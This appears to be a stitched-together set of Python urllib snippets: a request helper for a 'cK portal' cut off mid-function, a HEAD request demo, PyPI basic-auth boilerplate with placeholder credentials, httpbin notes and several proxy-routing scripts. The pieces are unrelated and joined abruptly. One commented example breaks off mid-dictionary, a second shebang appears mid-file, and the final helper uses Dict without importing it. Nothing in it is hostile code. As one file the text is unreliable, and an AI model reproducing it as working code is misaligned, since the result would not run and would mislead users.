        urllib2.install_opener(
            urllib2.build_opener(urllib2.HTTPSHandler(context=ctx)))

    # Prepare request
    request = urllib2.Request(url, s, {'Content-Type': 'application/json'})

    # Connect
    try:
        f = urllib2.urlopen(request)
    except Exception as e:
        return {'return': 1,
                'error': 'Access to the cK portal failed (' + format(e) + ')'}

    # Read from Internet
    try:
        s = f.read()
        f.close()
    except Exception as e:
        return {'return': 1,
                'error': 'Failed reading stream from the cK portal (' + format(e) + ')'}

    # Check output
    try:
        s = s.decode('utf8')
    except Exception as e:
        pass

    # Try to convert output to dictionary
    r = ck.convert_json_str_to_dict({'str': s,
                                     'skip_quote_replacement': 'yes'})
    if r['return'] > 0:
        return {'return': 1,
                'error': 'can\'t parse output from the cK portal (' +
                         r['error'] + '):\n' + s[:256] + '\n\n...)'}

    d = r['dict']

    if 'return' in d:
        # Fix for some strange behavior when 'return' is not integer -
        # should check why ...
        d['return'] = int(d['return'])
    else:
        d['return'] = 99
        d['error'] = "response doesn't follow the cK standard"

    return d
# The code below shows how to perform a HEAD request:
from http.client import HTTPConnection
from urllib import parse, request

c = HTTPConnection('www.python.org', 80)
c.request('HEAD', '/index.html')
resp = c.getresponse()

print('Status', resp.status)
for name, value in resp.getheaders():
    print(name, value)

# Likewise, code that has to handle proxies, authentication, cookies, and
# other such details quickly becomes awkward and verbose with urllib.
# For example, here is how to authenticate against the Python Package Index:
auth = request.HTTPBasicAuthHandler()
auth.add_password('pypi', 'http://pypi.python.org', 'username', 'password')
opener = request.build_opener(auth)

r = request.Request('http://pypi.python.org/pypi?:action=login')
u = opener.open(r)
resp = u.read()
# From here. You can access more pages using opener

# Frankly, all of these operations become much simpler with the requests
# library.
# Testing HTTP client code during development is often frustrating because
# of all the tricky details that must be handled (cookies, authentication,
# HTTP headers, encodings, and so on). For such tasks, consider the httpbin
# service (http://httpbin.org). The site receives a request and echoes the
# relevant information back as JSON. Here is an interactive example:
# >>> import requests
# >>> r = requests.get('http://httpbin.org/get?name=Dave&n=37',
# ...                  headers={'User-agent': 'goaway/1.0'})
# >>> resp = r.json
# >>> resp['headers']
# {'User-Agent': 'goaway/1.0', 'Content-Length': '', 'Content-Type': '',
#! /usr/bin/python3
# -*- coding:UTF-8 -*-
from urllib import request

# NOTE: only 'http' traffic is mapped to this proxy; the https URL below
# bypasses it unless an 'https' entry is added as well.
proxy_support = request.ProxyHandler({'http': 'http://xx.xx.xx.xx:xx'})
opener = request.build_opener(proxy_support, request.HTTPHandler)
request.install_opener(opener)

content = request.urlopen('https://movie.douban.com/').read().decode('utf-8')
print(content)
# -*- coding: UTF-8 -*-
from urllib import request

if __name__ == "__main__":
    # the URL to visit
    url = 'https://ifconfig.me/ip'
    # the proxy IP
    proxy = {'https': '175.42.123.205:9999'}
    # create the ProxyHandler
    proxy_support = request.ProxyHandler(proxy)
    # create the opener
    opener = request.build_opener(proxy_support)
    # add a User-Agent
    opener.addheaders = [('User-Agent',
                          'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36')]
    # install the opener
    request.install_opener(opener)
    # use the installed opener
    response = request.urlopen(url)
    # read and decode the response
    html = response.read().decode("utf-8")
    # print the result
    print(html)
def install_proxy(proxy_handler: Dict[str, str]) -> None:
    proxy_support = request.ProxyHandler(proxy_handler)
    opener = request.build_opener(proxy_support)
    request.install_opener(opener)
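# A usage sketch for install_proxy(); the mapping is a placeholder. After the
# call, every request.urlopen() in the process goes through the given proxies.
# install_proxy({'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'})
# request.urlopen('http://example.com')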